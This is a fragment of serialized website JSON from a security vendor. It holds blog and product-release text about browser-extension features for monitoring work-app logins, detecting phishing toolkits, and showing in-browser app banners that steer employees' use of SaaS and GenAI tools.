Type":173,"value":230457,"marks":245033,"data":245034},[],{},{"nodeType":178,"data":245036,"content":245037},{},[245038],{"nodeType":173,"value":230464,"marks":245039,"data":245040},[],{},{"nodeType":178,"data":245042,"content":245043},{},[245044,245047,245054,245057,245064,245067,245074,245077,245084],{"nodeType":173,"value":230471,"marks":245045,"data":245046},[],{},{"nodeType":186,"data":245048,"content":245049},{"uri":181526},[245050],{"nodeType":173,"value":226380,"marks":245051,"data":245053},[245052],{"type":194},{},{"nodeType":173,"value":1464,"marks":245055,"data":245056},[],{},{"nodeType":186,"data":245058,"content":245059},{"uri":181538},[245060],{"nodeType":173,"value":230488,"marks":245061,"data":245063},[245062],{"type":194},{},{"nodeType":173,"value":230493,"marks":245065,"data":245066},[],{},{"nodeType":186,"data":245068,"content":245069},{"uri":70029},[245070],{"nodeType":173,"value":230500,"marks":245071,"data":245073},[245072],{"type":194},{},{"nodeType":173,"value":230505,"marks":245075,"data":245076},[],{},{"nodeType":186,"data":245078,"content":245079},{"uri":162243},[245080],{"nodeType":173,"value":230512,"marks":245081,"data":245083},[245082],{"type":194},{},{"nodeType":173,"value":230517,"marks":245085,"data":245086},[],{},{"nodeType":178,"data":245088,"content":245089},{},[245090],{"nodeType":173,"value":230524,"marks":245091,"data":245092},[],{},{"nodeType":231,"data":245094,"content":245095},{},[],{"nodeType":178,"data":245097,"content":245098},{},[245099],{"nodeType":173,"value":230534,"marks":245100,"data":245101},[],{},{"nodeType":312,"data":245103,"content":245106},{"target":245104},{"sys":245105},{"id":229805,"type":317,"linkType":318},[],{"nodeType":178,"data":245108,"content":245109},{},[245110],{"nodeType":173,"value":37,"marks":245111,"data":245112},[],{},{"entries":245114},{"hyperlink":245115,"inline":245116,"block":245117},[],[],[245118,245121],{"sys":245119,"__typename":15269,"type":15270,"ctaText":245120,"buttonLabel":142998,"buttonColour":152046,"buttonUrl":196248},{"id":229805},"On-demand Webinar: Phishing 2.0 - Detecting Evilginx, EvilnoVNC, Muraena and Modlishka",{"sys":245122,"__typename":127689,"title":245123,"youTubeUrl":245124,"imagePlaceholder":245125},{"id":230213},"AitM phishing demo","https://www.youtube.com/watch?v=TEWzVvXTdXk",{"url":245126,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/2O59jdR3b98uW4KTukm3Da/c671989fada93d0d5ac1ecca4cf4860e/Introducing_SSO_Password_Protection__1_.png","content:blog:phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm.json","blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm.json","blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm",{"_path":245131,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":245132,"ogImage":118,"summary":245134,"title":189751,"subtitle":118,"metaTitle":245145,"synopsis":189752,"hashTags":118,"publishedDate":189753,"slug":189754,"tagsCollection":245146,"relatedBlogPostsCollection":245150,"authorsCollection":245578,"content":245582,"_id":245994,"_type":5439,"_source":5440,"_file":245995,"_stem":245996,"_extension":5439},"/blog/product-release-may-2024",{"id":189332,"publishedAt":245133},"2024-05-23T14:11:30.205Z",{"json":245135},{"data":245136,"content":245137,"nodeType":165},{},[245138],{"data":245139,"content":245140,"nodeType":178},{},[245141],{"data":245142,"marks":245143,"value":245144,"nodeType":173},{},[],"Our latest development sprint focused on extending the power of the Push browser agent to detect and prevent identity attacks that evade traditional security controls. We’ve also enhanced our popular app banners feature, and added more API and webhooks options for managing Push programmatically.","Push Security new product features for May 2024",{"items":245147},[245148],{"sys":245149,"name":18399},{"id":18398},{"items":245151},[245152,245321],{"__typename":1528,"sys":245153,"content":245154,"title":220517,"synopsis":220518,"hashTags":118,"publishedDate":220519,"slug":220520,"tagsCollection":245313,"authorsCollection":245317},{"id":220337},{"json":245155},{"data":245156,"content":245157,"nodeType":165},{},[245158,245164,245194,245200,245213,245218,245233,245239,245252,245257,245272,245278,245291,245296],{"data":245159,"content":245160,"nodeType":235},{},[245161],{"data":245162,"marks":245163,"value":220348,"nodeType":173},{},[],{"data":245165,"content":245166,"nodeType":250},{},[245167,245176,245185],{"data":245168,"content":245169,"nodeType":254},{},[245170],{"data":245171,"content":245172,"nodeType":178},{},[245173],{"data":245174,"marks":245175,"value":220361,"nodeType":173},{},[],{"data":245177,"content":245178,"nodeType":254},{},[245179],{"data":245180,"content":245181,"nodeType":178},{},[245182],{"data":245183,"marks":245184,"value":220371,"nodeType":173},{},[],{"data":245186,"content":245187,"nodeType":254},{},[245188],{"data":245189,"content":245190,"nodeType":178},{},[245191],{"data":245192,"marks":245193,"value":220381,"nodeType":173},{},[],{"data":245195,"content":245196,"nodeType":235},{},[245197],{"data":245198,"marks":245199,"value":220361,"nodeType":173},{},[],{"data":245201,"content":245202,"nodeType":178},{},[245203,245206,245210],{"data":245204,"marks":245205,"value":220394,"nodeType":173},{},[],{"data":245207,"marks":245208,"value":220399,"nodeType":173},{},[245209],{"type":370},{"data":245211,"marks":245212,"value":220403,"nodeType":173},{},[],{"data":245214,"content":245217,"nodeType":312},{"target":245215},{"sys":245216},{"id":220408,"type":317,"linkType":318},[],{"data":245219,"content":245220,"nodeType":178},{},[245221,245224,245230],{"data":245222,"marks":245223,"value":37,"nodeType":173},{},[],{"data":245225,"content":245226,"nodeType":186},{"uri":220418},[245227],{"data":245228,"marks":245229,"value":18605,"nodeType":173},{},[],{"data":245231,"marks":245232,"value":37,"nodeType":173},{},[],{"data":245234,"content":245235,"nodeType":235},{},[245236],{"data":245237,"marks":245238,"value":220432,"nodeType":173},{},[],{"data":245240,"content":245241,"nodeType":178},{},[245242,245245,245249],{"data":245243,"marks":245244,"value":65284,"nodeType":173},{},[],{"data":245246,"marks":245247,"value":220443,"nodeType":173},{},[245248],{"type":370},{"data":245250,"marks":245251,"value":220447,"nodeType":173},{},[],{"data":245253,"content":245256,"nodeType":312},{"target":245254},{"sys":245255},{"id":220452,"type":317,"linkType":318},[],{"data":245258,"content":245259,"nodeType":178},{},[245260,245263,245269],{"data":245261,"marks":245262,"value":37,"nodeType":173},{},[],{"data":245264,"content":245265,"nodeType":186},{"uri":220462},[245266],{"data":245267,"marks":245268,"value":220467,"nodeType":173},{},[],{"data":245270,"marks":245271,"value":37,"nodeType":173},{},[],{"data":245273,"content":245274,"nodeType":235},{},[245275],{"data":245276,"marks":245277,"value":220477,"nodeType":173},{},[],{"data":245279,"content":245280,"nodeType":178},{},[245281,245284,245288],{"data":245282,"marks":245283,"value":220484,"nodeType":173},{},[],{"data":245285,"marks":245286,"value":220489,"nodeType":173},{},[245287],{"type":370},{"data":245289,"marks":245290,"value":220493,"nodeType":173},{},[],{"data":245292,"content":245295,"nodeType":312},{"target":245293},{"sys":245294},{"id":220498,"type":317,"linkType":318},[],{"data":245297,"content":245298,"nodeType":178},{},[245299,245302,245310],{"data":245300,"marks":245301,"value":37,"nodeType":173},{},[],{"data":245303,"content":245306,"nodeType":1698},{"target":245304},{"sys":245305},{"id":2466,"type":317,"linkType":318},[245307],{"data":245308,"marks":245309,"value":18605,"nodeType":173},{},[],{"data":245311,"marks":245312,"value":37,"nodeType":173},{},[],{"items":245314},[245315],{"sys":245316,"name":18399},{"id":18398},{"items":245318},[245319],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":245320},{"url":19129},{"__typename":1528,"sys":245322,"content":245324,"title":245566,"synopsis":245567,"hashTags":118,"publishedDate":245568,"slug":245569,"tagsCollection":245570,"authorsCollection":245574},{"id":245323},"VgPmHQHDcjoeLaskUECTJ",{"json":245325},{"data":245326,"content":245327,"nodeType":165},{},[245328,245334,245377,245383,245390,245396,245414,245420,245444,245450,245468,245475,245482,245489,245504,245511,245527,245542,245548],{"data":245329,"content":245330,"nodeType":235},{},[245331],{"data":245332,"marks":245333,"value":220348,"nodeType":173},{},[],{"data":245335,"content":245336,"nodeType":250},{},[245337,245347,245357,245367],{"data":245338,"content":245339,"nodeType":254},{},[245340],{"data":245341,"content":245342,"nodeType":178},{},[245343],{"data":245344,"marks":245345,"value":245346,"nodeType":173},{},[],"Add guardrails to apps with app banners",{"data":245348,"content":245349,"nodeType":254},{},[245350],{"data":245351,"content":245352,"nodeType":178},{},[245353],{"data":245354,"marks":245355,"value":245356,"nodeType":173},{},[],"Monitor all domains for work app logins",{"data":245358,"content":245359,"nodeType":254},{},[245360],{"data":245361,"content":245362,"nodeType":178},{},[245363],{"data":245364,"marks":245365,"value":245366,"nodeType":173},{},[],"Better monitoring with Login event webhook",{"data":245368,"content":245369,"nodeType":254},{},[245370],{"data":245371,"content":245372,"nodeType":178},{},[245373],{"data":245374,"marks":245375,"value":245376,"nodeType":173},{},[],"Detect password usage on recently onboarded SSO apps",{"data":245378,"content":245379,"nodeType":235},{},[245380],{"data":245381,"marks":245382,"value":245346,"nodeType":173},{},[],{"data":245384,"content":245385,"nodeType":178},{},[245386],{"data":245387,"marks":245388,"value":245389,"nodeType":173},{},[],"Add a custom message that will appear when employees log in or sign up for an app using Push’s new app banner feature (so far, ChatGPT is a popular use case!). These customizable messages let you set guardrails for employees’ use of apps, reducing the risk of security issues and SaaS sprawl. You can check out some examples on our blog.",{"data":245391,"content":245395,"nodeType":312},{"target":245392},{"sys":245393},{"id":245394,"type":317,"linkType":318},"6tfTX8lzV6soQtoaJp38kS",[],{"data":245397,"content":245398,"nodeType":178},{},[245399,245402,245411],{"data":245400,"marks":245401,"value":37,"nodeType":173},{},[],{"data":245403,"content":245407,"nodeType":1698},{"target":245404},{"sys":245405},{"id":245406,"type":317,"linkType":318},"3m48a0kFoN8gh0IZQBup5U",[245408],{"data":245409,"marks":245410,"value":18605,"nodeType":173},{},[],{"data":245412,"marks":245413,"value":37,"nodeType":173},{},[],{"data":245415,"content":245416,"nodeType":235},{},[245417],{"data":245418,"marks":245419,"value":245356,"nodeType":173},{},[],{"data":245421,"content":245422,"nodeType":178},{},[245423,245427,245432,245436,245440],{"data":245424,"marks":245425,"value":245426,"nodeType":173},{},[],"You can now expand your monitoring of work app logins to include any domain an employee might be using, including non-company or personal accounts. You can enable the ",{"data":245428,"marks":245429,"value":245431,"nodeType":173},{},[245430],{"type":370},"Monitor all domains",{"data":245433,"marks":245434,"value":245435,"nodeType":173},{},[]," feature on the ",{"data":245437,"marks":245438,"value":2789,"nodeType":173},{},[245439],{"type":370},{"data":245441,"marks":245442,"value":245443,"nodeType":173},{},[]," page of the Push admin console.",{"data":245445,"content":245449,"nodeType":312},{"target":245446},{"sys":245447},{"id":245448,"type":317,"linkType":318},"3yzCMeWPk0kcpkfdRhKMpc",[],{"data":245451,"content":245452,"nodeType":178},{},[245453,245456,245465],{"data":245454,"marks":245455,"value":37,"nodeType":173},{},[],{"data":245457,"content":245461,"nodeType":1698},{"target":245458},{"sys":245459},{"id":245460,"type":317,"linkType":318},"4Z9ApuJ9JkrdsW9BfMIkQf",[245462],{"data":245463,"marks":245464,"value":189115,"nodeType":173},{},[],{"data":245466,"marks":245467,"value":37,"nodeType":173},{},[],{"data":245469,"content":245470,"nodeType":235},{},[245471],{"data":245472,"marks":245473,"value":245474,"nodeType":173},{},[],"Better monitoring with Login webhook event",{"data":245476,"content":245477,"nodeType":178},{},[245478],{"data":245479,"marks":245480,"value":245481,"nodeType":173},{},[],"You can now receive a webhook event any time employees perform a login to a work app. This event also captures the user’s IP address, browser, OS, and browser user-agent string. ",{"data":245483,"content":245484,"nodeType":178},{},[245485],{"data":245486,"marks":245487,"value":245488,"nodeType":173},{},[],"Use this data to alert you anytime someone uses a password to access a SAML-integrated app, check if users are accessing apps with non-work devices, identify unexpected identity providers or login methods for a particular app — or any other detections you can dream up!",{"data":245490,"content":245491,"nodeType":178},{},[245492,245495,245501],{"data":245493,"marks":245494,"value":37,"nodeType":173},{},[],{"data":245496,"content":245497,"nodeType":186},{"uri":71635},[245498],{"data":245499,"marks":245500,"value":18605,"nodeType":173},{},[],{"data":245502,"marks":245503,"value":37,"nodeType":173},{},[],{"data":245505,"content":245506,"nodeType":235},{},[245507],{"data":245508,"marks":245509,"value":245510,"nodeType":173},{},[],"Detect password usage to recently onboarded SSO apps",{"data":245512,"content":245513,"nodeType":178},{},[245514,245518,245523],{"data":245515,"marks":245516,"value":245517,"nodeType":173},{},[],"If you’ve recently onboarded an app to SSO, you probably want to know if users are still accessing it with orphan password-based accounts. You can now use the ",{"data":245519,"marks":245520,"value":245522,"nodeType":173},{},[245521],{"type":370},"Forget login methods",{"data":245524,"marks":245525,"value":245526,"nodeType":173},{},[]," feature in the Push admin console to remove older observed login methods for an app or account. If Push observes new login types, you’ll be able to quickly identify them (or set up a webhook, described above, to alert you directly). ",{"data":245528,"content":245529,"nodeType":178},{},[245530,245534,245538],{"data":245531,"marks":245532,"value":245533,"nodeType":173},{},[],"You can also use the ",{"data":245535,"marks":245536,"value":245522,"nodeType":173},{},[245537],{"type":370},{"data":245539,"marks":245540,"value":245541,"nodeType":173},{},[]," feature to clean up your data or remove old login methods that you know are no longer in use.",{"data":245543,"content":245547,"nodeType":312},{"target":245544},{"sys":245545},{"id":245546,"type":317,"linkType":318},"3WMEIQdgHWzG2Ws7y38JwI",[],{"data":245549,"content":245550,"nodeType":178},{},[245551,245554,245563],{"data":245552,"marks":245553,"value":37,"nodeType":173},{},[],{"data":245555,"content":245559,"nodeType":1698},{"target":245556},{"sys":245557},{"id":245558,"type":317,"linkType":318},"6d2kaN46h1B7MrmIiJ6iHw",[245560],{"data":245561,"marks":245562,"value":189115,"nodeType":173},{},[],{"data":245564,"marks":245565,"value":37,"nodeType":173},{},[],"Product release: February 2024","Here’s what’s new on the Push platform for February 2024.","2024-02-21T00:00:00.000Z","product-release-february-2024",{"items":245571},[245572],{"sys":245573,"name":18399},{"id":18398},{"items":245575},[245576],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":245577},{"url":19129},{"items":245579},[245580],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":245581},{"url":19129},{"json":245583,"links":245959},{"data":245584,"content":245585,"nodeType":165},{},[245586,245592,245649,245655,245668,245681,245687,245692,245709,245715,245728,245734,245739,245756,245762,245782,245795,245812,245818,245831,245844,245849,245866,245872,245892,245897,245914,245920,245944],{"data":245587,"content":245588,"nodeType":235},{},[245589],{"data":245590,"marks":245591,"value":65066,"nodeType":173},{},[],{"data":245593,"content":245594,"nodeType":250},{},[245595,245604,245613,245622,245631,245640],{"data":245596,"content":245597,"nodeType":254},{},[245598],{"data":245599,"content":245600,"nodeType":178},{},[245601],{"data":245602,"marks":245603,"value":125683,"nodeType":173},{},[],{"data":245605,"content":245606,"nodeType":254},{},[245607],{"data":245608,"content":245609,"nodeType":178},{},[245610],{"data":245611,"marks":245612,"value":24345,"nodeType":173},{},[],{"data":245614,"content":245615,"nodeType":254},{},[245616],{"data":245617,"content":245618,"nodeType":178},{},[245619],{"data":245620,"marks":245621,"value":183755,"nodeType":173},{},[],{"data":245623,"content":245624,"nodeType":254},{},[245625],{"data":245626,"content":245627,"nodeType":178},{},[245628],{"data":245629,"marks":245630,"value":157048,"nodeType":173},{},[],{"data":245632,"content":245633,"nodeType":254},{},[245634],{"data":245635,"content":245636,"nodeType":178},{},[245637],{"data":245638,"marks":245639,"value":189391,"nodeType":173},{},[],{"data":245641,"content":245642,"nodeType":254},{},[245643],{"data":245644,"content":245645,"nodeType":178},{},[245646],{"data":245647,"marks":245648,"value":189401,"nodeType":173},{},[],{"data":245650,"content":245651,"nodeType":235},{},[245652],{"data":245653,"marks":245654,"value":189408,"nodeType":173},{},[],{"data":245656,"content":245657,"nodeType":178},{},[245658,245661,245665],{"data":245659,"marks":245660,"value":189415,"nodeType":173},{},[],{"data":245662,"marks":245663,"value":189420,"nodeType":173},{},[245664],{"type":370},{"data":245666,"marks":245667,"value":189424,"nodeType":173},{},[],{"data":245669,"content":245670,"nodeType":178},{},[245671,245674,245678],{"data":245672,"marks":245673,"value":67566,"nodeType":173},{},[],{"data":245675,"marks":245676,"value":125683,"nodeType":173},{},[245677],{"type":370},{"data":245679,"marks":245680,"value":189438,"nodeType":173},{},[],{"data":245682,"content":245683,"nodeType":178},{},[245684],{"data":245685,"marks":245686,"value":189445,"nodeType":173},{},[],{"data":245688,"content":245691,"nodeType":312},{"target":245689},{"sys":245690},{"id":24862,"type":317,"linkType":318},[],{"data":245693,"content":245694,"nodeType":178},{},[245695,245698,245706],{"data":245696,"marks":245697,"value":37,"nodeType":173},{},[],{"data":245699,"content":245702,"nodeType":1698},{"target":245700},{"sys":245701},{"id":189461,"type":317,"linkType":318},[245703],{"data":245704,"marks":245705,"value":148770,"nodeType":173},{},[],{"data":245707,"marks":245708,"value":37,"nodeType":173},{},[],{"data":245710,"content":245711,"nodeType":235},{},[245712],{"data":245713,"marks":245714,"value":189475,"nodeType":173},{},[],{"data":245716,"content":245717,"nodeType":178},{},[245718,245721,245725],{"data":245719,"marks":245720,"value":167538,"nodeType":173},{},[],{"data":245722,"marks":245723,"value":189486,"nodeType":173},{},[245724],{"type":370},{"data":245726,"marks":245727,"value":189490,"nodeType":173},{},[],{"data":245729,"content":245730,"nodeType":178},{},[245731],{"data":245732,"marks":245733,"value":189497,"nodeType":173},{},[],{"data":245735,"content":245738,"nodeType":312},{"target":245736},{"sys":245737},{"id":189502,"type":317,"linkType":318},[],{"data":245740,"content":245741,"nodeType":178},{},[245742,245745,245753],{"data":245743,"marks":245744,"value":37,"nodeType":173},{},[],{"data":245746,"content":245749,"nodeType":1698},{"target":245747},{"sys":245748},{"id":2148,"type":317,"linkType":318},[245750],{"data":245751,"marks":245752,"value":18605,"nodeType":173},{},[],{"data":245754,"marks":245755,"value":37,"nodeType":173},{},[],{"data":245757,"content":245758,"nodeType":235},{},[245759],{"data":245760,"marks":245761,"value":189527,"nodeType":173},{},[],{"data":245763,"content":245764,"nodeType":178},{},[245765,245768,245772,245775,245779],{"data":245766,"marks":245767,"value":189534,"nodeType":173},{},[],{"data":245769,"marks":245770,"value":189539,"nodeType":173},{},[245771],{"type":370},{"data":245773,"marks":245774,"value":189543,"nodeType":173},{},[],{"data":245776,"marks":245777,"value":189548,"nodeType":173},{},[245778],{"type":370},{"data":245780,"marks":245781,"value":189552,"nodeType":173},{},[],{"data":245783,"content":245784,"nodeType":178},{},[245785,245788,245792],{"data":245786,"marks":245787,"value":189559,"nodeType":173},{},[],{"data":245789,"marks":245790,"value":189564,"nodeType":173},{},[245791],{"type":370},{"data":245793,"marks":245794,"value":1477,"nodeType":173},{},[],{"data":245796,"content":245797,"nodeType":178},{},[245798,245801,245809],{"data":245799,"marks":245800,"value":37,"nodeType":173},{},[],{"data":245802,"content":245805,"nodeType":1698},{"target":245803},{"sys":245804},{"id":114256,"type":317,"linkType":318},[245806],{"data":245807,"marks":245808,"value":148770,"nodeType":173},{},[],{"data":245810,"marks":245811,"value":37,"nodeType":173},{},[],{"data":245813,"content":245814,"nodeType":235},{},[245815],{"data":245816,"marks":245817,"value":189591,"nodeType":173},{},[],{"data":245819,"content":245820,"nodeType":178},{},[245821,245824,245828],{"data":245822,"marks":245823,"value":189598,"nodeType":173},{},[],{"data":245825,"marks":245826,"value":157048,"nodeType":173},{},[245827],{"type":370},{"data":245829,"marks":245830,"value":189606,"nodeType":173},{},[],{"data":245832,"content":245833,"nodeType":178},{},[245834,245837,245841],{"data":245835,"marks":245836,"value":189613,"nodeType":173},{},[],{"data":245838,"marks":245839,"value":189618,"nodeType":173},{},[245840],{"type":370},{"data":245842,"marks":245843,"value":189622,"nodeType":173},{},[],{"data":245845,"content":245848,"nodeType":312},{"target":245846},{"sys":245847},{"id":189627,"type":317,"linkType":318},[],{"data":245850,"content":245851,"nodeType":178},{},[245852,245855,245863],{"data":245853,"marks":245854,"value":37,"nodeType":173},{},[],{"data":245856,"content":245859,"nodeType":1698},{"target":245857},{"sys":245858},{"id":183743,"type":317,"linkType":318},[245860],{"data":245861,"marks":245862,"value":18605,"nodeType":173},{},[],{"data":245864,"marks":245865,"value":37,"nodeType":173},{},[],{"data":245867,"content":245868,"nodeType":235},{},[245869],{"data":245870,"marks":245871,"value":189652,"nodeType":173},{},[],{"data":245873,"content":245874,"nodeType":178},{},[245875,245878,245882,245885,245889],{"data":245876,"marks":245877,"value":189659,"nodeType":173},{},[],{"data":245879,"marks":245880,"value":157095,"nodeType":173},{},[245881],{"type":370},{"data":245883,"marks":245884,"value":189667,"nodeType":173},{},[],{"data":245886,"marks":245887,"value":189672,"nodeType":173},{},[245888],{"type":370},{"data":245890,"marks":245891,"value":189676,"nodeType":173},{},[],{"data":245893,"content":245896,"nodeType":312},{"target":245894},{"sys":245895},{"id":189681,"type":317,"linkType":318},[],{"data":245898,"content":245899,"nodeType":178},{},[245900,245903,245911],{"data":245901,"marks":245902,"value":37,"nodeType":173},{},[],{"data":245904,"content":245907,"nodeType":1698},{"target":245905},{"sys":245906},{"id":2466,"type":317,"linkType":318},[245908],{"data":245909,"marks":245910,"value":18605,"nodeType":173},{},[],{"data":245912,"marks":245913,"value":37,"nodeType":173},{},[],{"data":245915,"content":245916,"nodeType":235},{},[245917],{"data":245918,"marks":245919,"value":189706,"nodeType":173},{},[],{"data":245921,"content":245922,"nodeType":178},{},[245923,245926,245930,245933,245941],{"data":245924,"marks":245925,"value":189713,"nodeType":173},{},[],{"data":245927,"marks":245928,"value":189718,"nodeType":173},{},[245929],{"type":370},{"data":245931,"marks":245932,"value":189722,"nodeType":173},{},[],{"data":245934,"content":245937,"nodeType":1698},{"target":245935},{"sys":245936},{"id":148863,"type":317,"linkType":318},[245938],{"data":245939,"marks":245940,"value":189731,"nodeType":173},{},[],{"data":245942,"marks":245943,"value":189735,"nodeType":173},{},[],{"data":245945,"content":245946,"nodeType":178},{},[245947,245950,245956],{"data":245948,"marks":245949,"value":37,"nodeType":173},{},[],{"data":245951,"content":245952,"nodeType":186},{"uri":183466},[245953],{"data":245954,"marks":245955,"value":18605,"nodeType":173},{},[],{"data":245957,"marks":245958,"value":13836,"nodeType":173},{},[],{"entries":245960},{"inline":245961,"hyperlink":245962,"block":245975},[],[245963,245965,245967,245969,245971,245973],{"sys":245964,"__typename":1528,"title":236248,"slug":236251},{"id":189461},{"sys":245966,"__typename":6655,"title":6656,"slug":6657,"articleId":6658},{"id":2148},{"sys":245968,"__typename":6655,"title":231683,"slug":231684,"articleId":231685},{"id":114256},{"sys":245970,"__typename":6655,"title":231678,"slug":231679,"articleId":231680},{"id":183743},{"sys":245972,"__typename":6655,"title":6691,"slug":6692,"articleId":6693},{"id":2466},{"sys":245974,"__typename":6655,"title":168022,"slug":168023,"articleId":168024},{"id":148863},[245976,245979,245984,245989],{"sys":245977,"__typename":5345,"title":46397,"caption":118,"layoutMode":118,"file":245978},{"id":24862},{"url":46399,"width":11967,"height":46400},{"sys":245980,"__typename":5345,"title":245981,"caption":118,"layoutMode":118,"file":245982},{"id":189502},"Phishing tool detection - config page - KB 10113",{"url":245983,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/6HtqcvdvEPR6MAKe8jeiD5/10957e2a6b436e84f3099f7b4138342d/phishing_tools_config_2.png",{"sys":245985,"__typename":5345,"title":245986,"caption":118,"layoutMode":118,"file":245987},{"id":189627},"Sample block page for URL blocking - KB 10112",{"url":245988,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/2t2ceBuafD0iZSTII0UulU/9e11bf48ecb51ef584c6a19dce2e28b3/blockpage_url.png",{"sys":245990,"__typename":5345,"title":245991,"caption":245992,"layoutMode":118,"file":245993},{"id":189681},"App banner - Reason mode - KB 10106","App banner in Reason mode",{"url":161702,"width":6852,"height":5400},"content:blog:product-release-may-2024.json","blog/product-release-may-2024.json","blog/product-release-may-2024",{"_path":245998,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":245999,"summary":246002,"title":246013,"subtitle":118,"metaTitle":246014,"synopsis":246012,"hashTags":118,"publishedDate":246015,"slug":246016,"ogImage":246017,"tagsCollection":246019,"relatedBlogPostsCollection":246025,"authorsCollection":247283,"content":247287,"_id":247691,"_type":5439,"_source":5440,"_file":247692,"_stem":247693,"_extension":5439},"/blog/control-which-cloud-apps-employees-are-using-your-way",{"id":246000,"publishedAt":246001},"214PIK43juDRzIflctLPOj","2026-01-30T09:24:18.990Z",{"json":246003},{"data":246004,"content":246005,"nodeType":165},{},[246006],{"data":246007,"content":246008,"nodeType":178},{},[246009],{"data":246010,"marks":246011,"value":246012,"nodeType":173},{},[],"Use Push's variety of app banner options to control which cloud apps employees use, and how they use them.","Enforce end-user security controls with our new app banner options","Control SaaS app usage with in-browser app banners","2024-05-15T00:00:00.000Z","control-which-cloud-apps-employees-are-using-your-way",{"url":246018},"https://images.ctfassets.net/y1cdw1ablpvd/73UuFKQ7Pd0i577V9wRQw5/aaa5a8bd133c051bd4cf489c3c2599d0/App-Banner-Updates.png",{"items":246020},[246021,246023],{"sys":246022,"name":18399},{"id":18398},{"sys":246024,"name":26137},{"id":26136},{"items":246026},[246027,246361,246835],{"__typename":1528,"sys":246028,"content":246029,"title":246348,"synopsis":246043,"hashTags":118,"publishedDate":246349,"slug":246350,"tagsCollection":246351,"authorsCollection":246357},{"id":245406},{"json":246030},{"nodeType":165,"data":246031,"content":246032},{},[246033,246039,246047,246059,246066,246073,246116,246122,246129,246136,246143,246150,246175,246182,246188,246259,246266,246273,246280,246286,246293,246300,246306,246313,246320,246326,246332],{"nodeType":312,"data":246034,"content":246038},{"target":246035},{"sys":246036},{"id":246037,"type":317,"linkType":318},"3OXZccsHUbm5vXq1Ouv9H8",[],{"nodeType":178,"data":246040,"content":246041},{},[246042],{"nodeType":173,"value":246043,"marks":246044,"data":246046},"Don’t leave it up to your employees to figure out how to use cloud apps securely. Guide them directly in their browsers when they access their apps.",[246045],{"type":370},{},{"nodeType":178,"data":246048,"content":246049},{},[246050,246054],{"nodeType":173,"value":246051,"marks":246052,"data":246053},"That’s the concept behind our latest feature, in-browser app banners. They allow you to",[],{},{"nodeType":173,"value":246055,"marks":246056,"data":246058}," create custom messages that guide employees to follow your security policies on the apps they use for work.",[246057],{"type":370},{},{"nodeType":178,"data":246060,"content":246061},{},[246062],{"nodeType":173,"value":246063,"marks":246064,"data":246065},"For example, at the top of this page you can see an app banner that tells employees using ChatGPT not to put company or customer data into the app, and provides a link to the company’s GenAI policy:",[],{},{"nodeType":178,"data":246067,"content":246068},{},[246069],{"nodeType":173,"value":246070,"marks":246071,"data":246072},"The banners are fully customizable, so you can enter whatever text you like. Here are a few ideas to get you started:",[],{},{"nodeType":250,"data":246074,"content":246075},{},[246076,246086,246096,246106],{"nodeType":254,"data":246077,"content":246078},{},[246079],{"nodeType":178,"data":246080,"content":246081},{},[246082],{"nodeType":173,"value":246083,"marks":246084,"data":246085},"Encourage employees to use an approved app over a new, unsupported alternative.",[],{},{"nodeType":254,"data":246087,"content":246088},{},[246089],{"nodeType":178,"data":246090,"content":246091},{},[246092],{"nodeType":173,"value":246093,"marks":246094,"data":246095},"Remind employees not to enter sensitive information into ChatGPT or other GenAI tools.",[],{},{"nodeType":254,"data":246097,"content":246098},{},[246099],{"nodeType":178,"data":246100,"content":246101},{},[246102],{"nodeType":173,"value":246103,"marks":246104,"data":246105},"Tell employees not to use an app until it can be reviewed by the security team.",[],{},{"nodeType":254,"data":246107,"content":246108},{},[246109],{"nodeType":178,"data":246110,"content":246111},{},[246112],{"nodeType":173,"value":246113,"marks":246114,"data":246115},"Ask employees to use their federated identity on apps supporting SSO.",[],{},{"nodeType":312,"data":246117,"content":246121},{"target":246118},{"sys":246119},{"id":246120,"type":317,"linkType":318},"6XuJbfjhrr9JDKY6fcD5hZ",[],{"nodeType":169,"data":246123,"content":246124},{},[246125],{"nodeType":173,"value":246126,"marks":246127,"data":246128},"Why did we build it?",[],{},{"nodeType":178,"data":246130,"content":246131},{},[246132],{"nodeType":173,"value":246133,"marks":246134,"data":246135},"We co-created this feature with our customers. They wanted a more flexible and nuanced way of managing the risks associated with using SaaS apps than just allowlisting or blocklisting apps. ",[],{},{"nodeType":178,"data":246137,"content":246138},{},[246139],{"nodeType":173,"value":246140,"marks":246141,"data":246142},"That means guiding employees to use apps more safely rather than just blocking new tools by default.",[],{},{"nodeType":178,"data":246144,"content":246145},{},[246146],{"nodeType":173,"value":246147,"marks":246148,"data":246149},"Now don’t get us wrong — there’s a time and a place for blocking. But for most organizations, there are more scenarios when it's better to help employees do something safely. ",[],{},{"nodeType":178,"data":246151,"content":246152},{},[246153,246157,246162,246166,246171],{"nodeType":173,"value":246154,"marks":246155,"data":246156},"That’s the reason why we ",[],{},{"nodeType":173,"value":246158,"marks":246159,"data":246161},"wanted",[246160],{"type":1646},{},{"nodeType":173,"value":246163,"marks":246164,"data":246165}," to build the feature. The reason we were ",[],{},{"nodeType":173,"value":246167,"marks":246168,"data":246170},"able",[246169],{"type":1646},{},{"nodeType":173,"value":246172,"marks":246173,"data":246174}," to build it is because Push’s superpower is a browser extension that detects signups and logins to supported and unsupported apps, and then helps you manage and secure accounts and identities on all of them. ",[],{},{"nodeType":178,"data":246176,"content":246177},{},[246178],{"nodeType":173,"value":246179,"marks":246180,"data":246181},"The Push browser extension gets you the closest to the user, providing the ideal platform for security teams to guide employees at exactly the right time and place — when they’re accessing an app in their browser.",[],{},{"nodeType":169,"data":246183,"content":246184},{},[246185],{"nodeType":173,"value":235856,"marks":246186,"data":246187},[],{},{"nodeType":246189,"data":246190,"content":246191},"ordered-list",{},[246192,246202,246212,246231,246249],{"nodeType":254,"data":246193,"content":246194},{},[246195],{"nodeType":178,"data":246196,"content":246197},{},[246198],{"nodeType":173,"value":246199,"marks":246200,"data":246201},"You can configure an app banner in less than 1 minute. Here are the 4 steps, or just scroll down to the demos below to see for yourself. 